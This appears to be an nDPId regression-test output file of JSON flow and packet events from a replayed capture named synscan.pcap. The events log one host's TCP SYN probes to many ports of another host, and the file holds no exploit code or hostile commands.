-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsI3IAAC4G9wCsEAAIQA2GNIzSBD7dUoMYAAAAAGACDAAoUQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAstG0AADoGWgWsEAAIQA2GNIzSBBzdUoMYAAAAAGACDAAocwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAssh8AAC8GZ1OsEAAIQA2GNIzSD5vdUoMYAAAAAGACEAAY9AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsqVsAACsGdBesEAAIQA2GNIzSEyTdUoMYAAAAAGACEAAVawAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAshXIAADcGjACsEAAIQA2GNIzSdTDdUoMYAAAAAGACEACzXgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsTHsAACYG1fesEAAIQA2GNIzSACrdUoMYAAAAAGACDAAsZQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAscHUAADUGov2sEAAIQA2GNIzSySXdUoMYAAAAAGACCABnaQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsCSMAADAGD1CsEAAIQA2GNIzSIADdUoMYAAAAAGACBAAUjwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsZzsAACsGtjesEAAIQA2GNIzSBPfdUoMYAAAAAGACEAAjmAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAs970AADoGFrWsEAAIQA2GNIzSPpDdUoMYAAAAAGACDADt\/gAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs+JEAADEGHuGsEAAIQA2GNIzTGZPdU4MZAAAAAGACCAAW+QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs65oAACYGNtisEAAIQA2GNIzTCADdU4MZAAAAAGACDAAkjAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsOSQAACcG6E6sEAAIQA2GNIzTBAfdU4MZAAAAAGACEAAkhQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsMb0AADYG4LWsEAAIQA2GNIzTC9bdU4MZAAAAAGACDAAgtgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsLlAAAC0G7SKsEAAIQA2GNIzTH6PdU4MZAAAAAGACCAAQ6QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsDQ4AADEGCmWsEAAIQA2GNIzTH0LdU4MZAAAAAGACCAARSgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/csAACYGJKesEAAIQA2GNIzTBRXdU4MZAAAAAGACDAAndwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsp+IAACkGd5CsEAAIQA2GNIzTAu3dU4MZAAAAAGACCAAtnwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs3QAAADsGMHKsEAAIQA2GNIzTI43dU4MZAAAAAGACEAAE\/wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsaMEAACoGtbGsEAAIQA2GNIzTFrLdU4MZAAAAAGACDAAV2gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsytsAADUGSJesEAAIQA2GNIzTF2\/dU4MZAAAAAGACCAAZHQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsCaYAACgGFs2sEAAIQA2GNIzTGnvdU4MZAAAAAGACBAAaEQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs9VgAADIGIRqsEAAIQA2GNIzTJxTdU4MZAAAAAGACDAAFeAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsmN8AADoGdZOsEAAIQA2GNIzTHcndU4MZAAAAAGACDAAOwwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAswcUAADIGVK2sEAAIQA2GNIzTD0HdU4MZAAAAAGACDAAdSwAAAgQFtA=="} 
